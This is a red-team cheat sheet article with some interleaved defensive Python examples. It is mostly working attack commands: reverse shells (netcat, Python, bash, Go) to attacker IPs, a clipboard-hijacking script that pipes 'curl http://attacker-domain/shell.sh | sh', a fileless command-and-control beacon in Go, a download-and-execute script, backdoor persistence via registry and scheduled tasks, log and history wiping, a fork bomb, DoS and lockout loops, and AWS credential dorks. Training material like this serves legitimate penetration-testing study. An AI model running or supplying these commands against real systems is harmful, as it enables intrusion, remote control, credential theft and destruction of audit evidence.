Tactics, techniques and tools valuable to both red and blue teams: Red-Teaming-TTPs

Author: Sec-Labs | Published:

💥 Free online labs

· Academy Hackaflag BR - https://hackaflag.com.br/
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· CTF Komodo Security - https://ctf.komodosec.com
· CMD Challenge - https://cmdchallenge.com
· Exploitation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - http://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - http://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - http://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2

Linux system enumeration / post-exploitation

id
w
who -a
last -a
ps -ef
df -h
uname -a
mount
cat /etc/issue
cat /etc/release
cat /proc/version

Linux miscellaneous commands / covering tracks

chattr (+/-)i file
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
echo "" > /var/log/auth.log
echo "" > ~/.bash_history
kill -9 $$
ln /dev/null ~/.bash_history -sf

Fork denial of service (fork bomb)

:(){ :|:& };:

Monitoring traffic with tcpdump

tcpdump -i eth0 -XX -w out.pcap
tcpdump -i eth0 port XX dst X.X.X.X

Windows system enumeration

ver
sc query state=all
tasklist /svc
tasklist /m
tasklist /S ip /v
taskkill /PID pid /F
systeminfo /S ip /U domain\user /P Pwd
dir /a /s /b c:\*.pdf*
dir /a /b c:\windows\kb*
findstr /si password *.txt | *.xml | *.xls
tree /F /A c:\ > tree.txt
reg save HKLM\Security security.hive
echo %USERNAME%

Enabling RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(Tunnel RDP through port 443) REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

PowerShell enumeration

Get-WmiObject -class win32_operatingsystem | select -property * | export-csv c:\os.txt
Get-Service | where-object {$_.status -eq "Running"}
(new-object system.net.webclient).downloadFile("url","dest")
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential("title","message","user","domain")
powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer Target_Email_Server_IP

Launching a Meterpreter payload with PowerShell

  1. msfvenom -p windows/meterpreter/reverse_https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 > audit.ps1
  2. Move audit.ps1 into the same folder as encodeMeterpreter.ps1
  3. Launch PowerShell (x86)
  4. powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
  5. Copy the encoded Meterpreter string

Windows user lockout

@echo Test run:
for /f %%U in (list.txt) do @for /l %%C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%%U wrongpass

Windows DHCP exhaustion

for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i netmask gw ID %1 ping 127.0.0.1 -n 1 -w 10000 > nul %1)

Rolling reboot

for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message"

TTL fingerprinting

Windows : 128
Linux : 64
Network : 255
Solaris : 255
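The table above gives initial TTLs; a packet you capture has already been decremented once per router, so the observed value sits somewhere below one of those starting points. The following added example (not part of the original cheat sheet or the Red-Teaming-TTPs repository) applies the table the way a blue team would when classifying hosts from ping or tcpdump output: it maps an observed TTL to the nearest initial value at or above it and treats the gap as the hop count. The ping lines are constructed for the example.

```python
import re

# Initial TTL values exactly as listed in the cheat sheet above.
INITIAL_TTLS = {64: "Linux", 128: "Windows", 255: "Network device / Solaris"}

# Constructed ping-style output used as sample input (not real hosts).
SAMPLE_PING_LINES = [
    "64 bytes from 10.0.0.5: icmp_seq=1 ttl=57 time=3.10 ms",
    "64 bytes from 10.0.0.9: icmp_seq=1 ttl=117 time=1.20 ms",
    "64 bytes from 10.0.0.1: icmp_seq=1 ttl=249 time=0.40 ms",
    "Request timeout for icmp_seq 1",
]

FROM_TTL_RE = re.compile(r"from (\d{1,3}(?:\.\d{1,3}){3}):.*\bttl=(\d+)", re.IGNORECASE)


def guess_os(observed_ttl):
    """Return (os_label, estimated_hops) for an observed TTL.

    The guess is the nearest initial TTL at or above the observed value; the
    difference is the number of routers the packet crossed. TTL is an 8-bit
    field and 0 means the packet expired, so anything outside 1..255 yields
    (None, None).
    """
    if not 0 < observed_ttl <= 255:
        return None, None
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    return None, None


def fingerprint_lines(lines):
    """Map every 'from <ip> ... ttl=N' line to {ip: (os_label, hops)}; other lines are skipped."""
    results = {}
    for line in lines:
        m = FROM_TTL_RE.search(line)
        if m:
            results[m.group(1)] = guess_os(int(m.group(2)))
    return results


if __name__ == "__main__":
    for ip, (label, hops) in fingerprint_lines(SAMPLE_PING_LINES).items():
        print(f"{ip}: likely {label}, about {hops} hop(s) away")
```

The caveat is built into the method: a Linux host more than 64 hops away, or an administrator who changed the default TTL, is misclassified, so treat the result as a hint to confirm with other evidence, not as proof.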

XSS testing

Use this string in every input field and identify which XSS metacharacters survive the filtering.

'';!--"<XSS>=&{()}
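What makes this probe useful is that each character tests a different escape, so the output of a filter tells you which contexts are still injectable. The following added example (not from the original cheat sheet or the Red-Teaming-TTPs repository) runs the probe through two hypothetical filters a developer might ship: a blocklist that strips only `<script>` tags, and proper HTML output encoding via Python's `html.escape`. The reporting function first removes well-formed entity references so that an encoded `&amp;` is not mistaken for a raw ampersand.

```python
import html
import re

# The probe string from the section above.
XSS_PROBE = """';!--"<XSS>=&{()}"""

# Characters that change meaning in an HTML context; the rest of the probe is inert text.
HTML_METACHARS = set("'\"<>&")

# Well-formed entity references (&lt; &#x27; &amp; ...) produced by a correct encoder.
ENTITY_RE = re.compile(r"&(?:#x?[0-9a-fA-F]+|[a-zA-Z]+);")


def naive_blocklist_filter(value):
    """Hypothetical weak filter: strips only literal <script> tags, case-insensitively."""
    return re.sub(r"</?script[^>]*>", "", value, flags=re.IGNORECASE)


def output_encoding_filter(value):
    """Correct approach for an HTML text or attribute context: encode every metacharacter."""
    return html.escape(value, quote=True)


def surviving_metachars(filter_fn, probe=XSS_PROBE):
    """Run the probe through a filter and report which metacharacters come out unencoded."""
    raw = ENTITY_RE.sub("", filter_fn(probe))
    return {c for c in raw if c in HTML_METACHARS}


def probe_survives(filter_fn, probe=XSS_PROBE):
    """True if the <XSS> marker tag is still intact, i.e. the filter left tag injection possible."""
    return "<XSS>" in filter_fn(probe)


if __name__ == "__main__":
    for name, fn in (("blocklist", naive_blocklist_filter), ("encoding", output_encoding_filter)):
        print(f"{name}: {fn(XSS_PROBE)!r} -> surviving {sorted(surviving_metachars(fn))}")
```

Note that `html.escape` is only right for HTML text and quoted attribute values; a value placed inside a JavaScript string or a URL needs that context's encoder, which is exactly what the remaining `;`, `=`, `(`, `)`, `{` and `}` in the probe are there to test.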

Cisco IOS 11.2 - 12.2 vulnerability

http://ip/level/16-99/exec/show/config

FTP through a non-interactive shell

echo open ip 21 > ftp.txt
echo user >> ftp.txt
echo pass >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

NetCat listener

nc 10.0.0.1 1234 -e /bin/sh    (Linux reverse shell)
nc 10.0.0.1 1234 -e cmd.exe    (Windows reverse shell)

Python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash reverse shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Windows persistence

1. REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
2. at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3. SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012

HPING3 DoS

hping3 targetIP --flood --frag --spoof ip --destport # --syn

Hydra brute force

hydra -l ftp -P words -v targetIP ftp

Download an HTTP file and execute it

#!/usr/bin/python3
# Python 3 port of the original Python 2 (urllib2) script
import os
import urllib.request

urls = ["1.1.1.1", "2.2.2.2"]
port = "80"
payload = "cb.sh"

# Try each host in turn and keep the first copy that downloads successfully
for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib.request.urlopen(u)
        with open("/tmp/cb.sh", "wb") as wfile:
            wfile.write(r.read())
        break
    except Exception:
        continue

if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os.system("/tmp/cb.sh")

Hashcat

DICTIONARY ATTACK          hashcat -a 0 -m #type hash.txt dict.txt
DICTIONARY + RULES ATTACK  hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
COMBINATION ATTACK         hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
MASK ATTACK                hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
HYBRID DICTIONARY + MASK   hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
HYBRID MASK + DICTIONARY   hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
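The attack modes in the table differ mainly in how many candidates they generate, which is the number a defender needs when judging whether a password policy holds up against a given cracking rate. The following added example (not from the original cheat sheet or from hashcat itself) parses hashcat's mask syntax (`?l` lower, `?u` upper, `?d` digits, `?s` specials, `?a` all printable ASCII, `?b` all bytes, `??` a literal question mark) and computes the candidate count for each mode above; wordlists are represented by their line counts and the hash rate is a number you supply from your own benchmark.

```python
# Sizes of hashcat's built-in charsets.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}


def mask_keyspace(mask):
    """Number of candidates described by a hashcat mask (-a 3).

    Literal characters contribute exactly one choice, '??' is a literal '?',
    and an unknown '?x' charset raises ValueError rather than being miscounted.
    """
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            tok = mask[i + 1]
            if tok == "?":
                pass  # escaped literal question mark: one choice
            elif tok in CHARSET_SIZES:
                total *= CHARSET_SIZES[tok]
            else:
                raise ValueError(f"unknown charset ?{tok}")
            i += 2
        else:
            i += 1  # literal character
    return total


def attack_keyspace(mode, left, right=None, rules=1):
    """Candidate count for the modes in the table above.

    mode 0: left = wordlist size, rules = number of rules in rule.txt
    mode 1: left and right = the two wordlist sizes
    mode 3: left = mask string
    mode 6: left = wordlist size, right = mask string
    mode 7: left = mask string, right = wordlist size
    """
    if mode == 0:
        return left * rules
    if mode == 1:
        return left * right
    if mode == 3:
        return mask_keyspace(left)
    if mode == 6:
        return left * mask_keyspace(right)
    if mode == 7:
        return mask_keyspace(left) * right
    raise ValueError(f"unsupported attack mode {mode}")


def exhaustion_seconds(keyspace, hashes_per_second):
    """Worst-case time to try every candidate at a benchmark rate you measured yourself."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # Hypothetical rate and wordlist size, chosen only to illustrate the calculation.
    rate = 1_000_000_000
    for label, ks in (
        ("mask ?a?a?a?a?a?a", attack_keyspace(3, "?a?a?a?a?a?a")),
        ("dict(1e6) + ?a?a?a?a", attack_keyspace(6, 1_000_000, "?a?a?a?a")),
    ):
        print(f"{label}: {ks:,} candidates, {exhaustion_seconds(ks, rate) / 86400:.1f} days at {rate:,} H/s")
```

Because the factors multiply, adding one `?a` position grows the work by 95x while a rule set of 64 rules grows a dictionary run only 64x, which is why length beats character-class requirements in a policy.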

Malicious JavaScript

<script>
document.getElementById('copy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n');
    e.preventDefault();
});
</script>

Fileless script execution in Go

package main

import (
    "io"
    "net/http"
    "os/exec"
    "time"
)

func main() {
    for {
        url := "http://my_command_control:8080/executeThisScript" // Download your bash script
        resp, err := http.Get(url)
        if err != nil {
            time.Sleep(5 * time.Second) // server unreachable: wait for the next beaconing
            continue
        }
        shellScriptBody, _ := io.ReadAll(resp.Body) // keep in memory, nothing written to disk
        resp.Body.Close()                            // close here; a defer inside the loop would never run

        cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
        cmd.Start() // run in background

        time.Sleep(5 * time.Second) // wait for the next beaconing (a bare 5000 is 5 microseconds)
    }
}

Go reverse shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

Enumerating an IP with IPInfo

{
  "ip": "54.90.107.240",
  "hostname": "ec2-54-90-107-240.compute-1.amazonaws.com",
  "city": "Virginia Beach",
  "region": "Virginia",
  "country": "US",
  "loc": "36.8512,-76.1692",
  "org": "AS14618 Amazon.com, Inc.",
  "postal": "23465",
  "readme": "https://ipinfo.io/missingauth"
}

You can also use https://cybergordon.com/ to check an IP's reputation.

Email reconnaissance

curl emailrep.io/john.smith@gmail.com

{
  "email": "john.smith@gmail.com",
  "reputation": "high",
  "suspicious": false,
  "references": 91,
  "details": {
    "blacklisted": false,
    "malicious_activity": false,
    "malicious_activity_recent": false,
    "credentials_leaked": true,
    "credentials_leaked_recent": false,
    "data_breach": true,
    "last_seen": "07/27/2019",
    "domain_exists": true,
    "domain_reputation": "n/a",
    "new_domain": false,
    "days_since_domain_creation": 8773,
    "suspicious_tld": false,
    "spam": false,
    "free_provider": true,
    "disposable": false,
    "deliverable": true,
    "accept_all": false,
    "valid_mx": true,
    "spoofable": true,
    "spf_strict": true,
    "dmarc_enforced": false,
    "profiles": [
      "lastfm",
      "pinterest",
      "foursquare",
      "aboutme",
      "spotify",
      "twitter",
      "vimeo"
    ]
  }
}
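The same record that helps a red team pick a target helps a mail-gateway or incident responder decide how much to trust a sender. The following added example (not from the original cheat sheet or from emailrep.io) turns the response above into a verdict and a list of reasons. The sample record is the page's own; the two extra records are constructed to exercise the block and allow branches. The weighting is this example's own choice, not an emailrep.io scoring rule.

```python
import json

# Response copied from the emailrep.io example above.
SAMPLE_RESPONSE = json.loads("""{
  "email": "john.smith@gmail.com", "reputation": "high", "suspicious": false, "references": 91,
  "details": {
    "blacklisted": false, "malicious_activity": false, "malicious_activity_recent": false,
    "credentials_leaked": true, "credentials_leaked_recent": false, "data_breach": true,
    "last_seen": "07/27/2019", "domain_exists": true, "domain_reputation": "n/a",
    "new_domain": false, "days_since_domain_creation": 8773, "suspicious_tld": false,
    "spam": false, "free_provider": true, "disposable": false, "deliverable": true,
    "accept_all": false, "valid_mx": true, "spoofable": true, "spf_strict": true,
    "dmarc_enforced": false,
    "profiles": ["lastfm", "pinterest", "foursquare", "aboutme", "spotify", "twitter", "vimeo"]
  }
}""")

# Constructed records (not real addresses) covering the block and allow paths.
MALICIOUS_RESPONSE = {"email": "x@example.invalid", "reputation": "none", "suspicious": True,
                      "details": {"malicious_activity": True, "new_domain": True, "profiles": []}}
CLEAN_RESPONSE = {"email": "y@example.invalid", "reputation": "high", "suspicious": False,
                  "details": {"spoofable": False, "dmarc_enforced": True, "profiles": ["twitter"]}}


def triage_email(rep):
    """Return (verdict, flags) for one emailrep.io record; verdict is block, review or allow."""
    d = rep.get("details", {})
    flags = []
    if rep.get("suspicious") or d.get("malicious_activity"):
        flags.append("flagged_malicious_or_suspicious")
    if d.get("blacklisted"):
        flags.append("blacklisted")
    if d.get("credentials_leaked"):
        flags.append("credentials_leaked")  # the mailbox itself may be attacker-controlled
    if d.get("spoofable") and not d.get("dmarc_enforced"):
        flags.append("spoofable_domain")  # From: can be forged; verify requests out of band
    if d.get("new_domain") or d.get("suspicious_tld") or d.get("disposable"):
        flags.append("low_trust_domain")
    if rep.get("reputation") == "none" and not d.get("profiles"):
        flags.append("no_history")

    if "flagged_malicious_or_suspicious" in flags or "blacklisted" in flags:
        verdict = "block"
    elif flags:
        verdict = "review"
    else:
        verdict = "allow"
    return verdict, flags


if __name__ == "__main__":
    for rec in (SAMPLE_RESPONSE, MALICIOUS_RESPONSE, CLEAN_RESPONSE):
        print(rec["email"], triage_email(rec))
```

The sample record lands in `review` rather than `block`: a high-reputation address with leaked credentials and a spoofable domain is exactly the profile of a legitimate contact whose mailbox has been taken over, so the right response is verification, not a blanket rule.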

IP enumeration with nrich

A command-line tool for quickly analysing all the IPs in a file and seeing which ones have open ports or known vulnerabilities. It also accepts data on stdin, so it can be used in a data pipeline.

Installation

$ wget https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb
$ sudo dpkg -i nrich_latest_amd64.deb

Confirmation

$ echo 149.202.182.140 | nrich -
149.202.182.140 (ftptech1.pcsoft.fr)
  Ports: 21, 80, 111, 443
  CPEs: cpe:/a:proftpd:proftpd:1.3.5b, cpe:/a:apache:http_server:2.4.25
  Vulnerabilities: CVE-2018-11763, CVE-2019-0220, CVE-2017-15710, CVE-2018-1312, CVE-2019-0197, CVE-2017-9798, CVE-2018-1283, CVE-2017-7668, CVE-2017-3169, CVE-2017-15715, CVE-2017-7659, CVE-2018-1333, CVE-2019-0211, CVE-2019-12815, CVE-2017-3167, CVE-2017-9788, CVE-2019-0196, CVE-2017-7679, CVE-2018-17199
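nrich's default shell output is meant for eyes, but an exposure inventory needs it as data. The following added example (not from the original cheat sheet or from the nrich project) parses that format into records and ranks hosts by exposure. The first host block is the output shown above; the second, with no hostname and no findings, is constructed to show the edge cases the parser must tolerate. The port watchlist is this example's own choice.

```python
import re

# First block copied from the nrich run above; second block constructed (not a real host).
SAMPLE_OUTPUT = """149.202.182.140 (ftptech1.pcsoft.fr)
  Ports: 21, 80, 111, 443
  CPEs: cpe:/a:proftpd:proftpd:1.3.5b, cpe:/a:apache:http_server:2.4.25
  Vulnerabilities: CVE-2018-11763, CVE-2019-0220, CVE-2017-15710, CVE-2018-1312, CVE-2019-0197, CVE-2017-9798, CVE-2018-1283, CVE-2017-7668, CVE-2017-3169, CVE-2017-15715, CVE-2017-7659, CVE-2018-1333, CVE-2019-0211, CVE-2019-12815, CVE-2017-3167, CVE-2017-9788, CVE-2019-0196, CVE-2017-7679, CVE-2018-17199
203.0.113.7
  Ports: 22
"""

# A host line is an IPv4 address at column 0, optionally followed by "(hostname)".
HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?:\s+\((.*)\))?\s*$")


def parse_nrich(text):
    """Parse nrich shell output into a list of {ip, hostname, ports, cpes, vulns} records."""
    hosts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = HOST_RE.match(line)
        if m:
            hosts.append({"ip": m.group(1), "hostname": m.group(2),
                          "ports": [], "cpes": [], "vulns": []})
            continue
        if not hosts or ":" not in line:
            continue  # indented field before any host, or a line we do not understand
        # Split on the first colon only: CPE values themselves contain colons.
        key, _, value = line.strip().partition(":")
        items = [v.strip() for v in value.split(",") if v.strip()]
        if key == "Ports":
            hosts[-1]["ports"] = [int(p) for p in items]
        elif key == "CPEs":
            hosts[-1]["cpes"] = items
        elif key == "Vulnerabilities":
            hosts[-1]["vulns"] = items
    return hosts


def prioritise(hosts, watch_ports=(21, 23, 445, 3389)):
    """Order hosts by CVE count, then by number of plaintext or remote-admin ports exposed."""
    def score(h):
        return (len(h["vulns"]), sum(1 for p in h["ports"] if p in watch_ports))
    return sorted(hosts, key=score, reverse=True)


if __name__ == "__main__":
    for h in prioritise(parse_nrich(SAMPLE_OUTPUT)):
        print(f"{h['ip']} ({h['hostname'] or '-'}): {len(h['vulns'])} CVEs, ports {h['ports']}")
```

For a pipeline the `-o json` option shown in the help text below is the better input; this parser is for the shell output you already have in a ticket or a terminal log.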

Usage

$ nrich --help
nrich 0.1.0
Add network information to IPs

USAGE:
    nrich [OPTIONS] <filename>

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
    -o, --output <output>    Output format (shell or json) [default: shell]

ARGS:
    <filename>    File containing an IP per line. Non-IPs are ignored

Enumerating anonymous FTP logins with Python

#!/usr/bin/python3

from ftplib import FTP, all_errors, error_perm
import sys

# Read one host per line; blank lines are skipped
with open(sys.argv[1], 'r') as ips:
    hosts = [line.strip() for line in ips if line.strip()]

for item in hosts:
    print("[+] Connecting to: %s \n" % item)
    try:
        ftp = FTP(item, timeout=3)
        ftp.login()  # no credentials given, so this is an anonymous login attempt
        # login() raises error_perm when anonymous access is refused, so reaching
        # this line means it is enabled; LIST shows what the server exposes
        ftp.retrlines('LIST')
        print("[+] Anonymous login enabled on Host: %s \n" % item)
        print("=" * 70 + "\n")
        ftp.quit()
    except error_perm:
        print("[-] Anonymous login refused on Host: %s\n" % item)
        print("=" * 70 + "\n")
    except all_errors:
        print("[+] Unable to Connect to Host: %s\n" % item)
        print("=" * 70 + "\n")

  1. Usage: python3 FTPLoginChecker.py ip_addresses.txt
  2. Note: use shodan_eye.py to search for FTP servers with anonymous login enabled.
  3. Search keyword: 230 anonymous

Python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Cloud

AWS

Shodan.io query to enumerate AWS instance metadata service access

/latest/meta-data/iam/security-credentials

Google dorking for AWS access keys

inurl:pastebin "AWS_ACCESS_KEY"

Google dorking for S3 logs

s3 site:amazonaws.com filetype:log
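The metadata path above only yields credentials to an outsider when an instance still answers unauthenticated IMDSv1 requests through some proxy or SSRF bug, so the defender's check is whether every instance requires IMDSv2 tokens. The following added example (not from the original cheat sheet or the Red-Teaming-TTPs repository) audits instance records in the shape of the `MetadataOptions` block that EC2 `DescribeInstances` returns (`HttpEndpoint`, `HttpTokens`, `HttpPutResponseHopLimit`); the instances themselves are constructed, and the finding names are this example's own.

```python
# Constructed instance records (not real instance IDs) in the DescribeInstances MetadataOptions shape.
SAMPLE_INSTANCES = [
    {"InstanceId": "i-0example1",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0example2",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0example3",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
]


def audit_imds(instance):
    """Return a list of findings for one instance's metadata service configuration."""
    opts = instance.get("MetadataOptions", {})
    findings = []
    if opts.get("HttpEndpoint", "enabled") == "disabled":
        return findings  # no metadata service at all: the /latest/meta-data path cannot be reached
    if opts.get("HttpTokens", "optional") != "required":
        # A plain GET to /latest/meta-data/iam/security-credentials/ returns the role keys,
        # which is what makes the instance reachable through an SSRF or open proxy.
        findings.append("imdsv1_allowed")
    if opts.get("HttpPutResponseHopLimit", 1) > 1:
        # With a hop limit above 1, containers and other network hops on the instance
        # can obtain IMDSv2 tokens; legitimate for some container setups, so flag for review.
        findings.append("hop_limit_over_1")
    return findings


def audit_fleet(instances):
    """Map InstanceId -> findings for every instance that has at least one finding."""
    report = {}
    for inst in instances:
        findings = audit_imds(inst)
        if findings:
            report[inst["InstanceId"]] = findings
    return report


if __name__ == "__main__":
    for instance_id, findings in audit_fleet(SAMPLE_INSTANCES).items():
        print(f"{instance_id}: {', '.join(findings)}")
```

In a live account the records come from boto3's `describe_instances` and the fix for `imdsv1_allowed` is `modify_instance_metadata_options` with `HttpTokens='required'`; the block above deliberately stops at the audit so it runs without credentials.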


Project URL

https://github.com/RoseSecurity/Red-Teaming-TTPs

Tags: study notes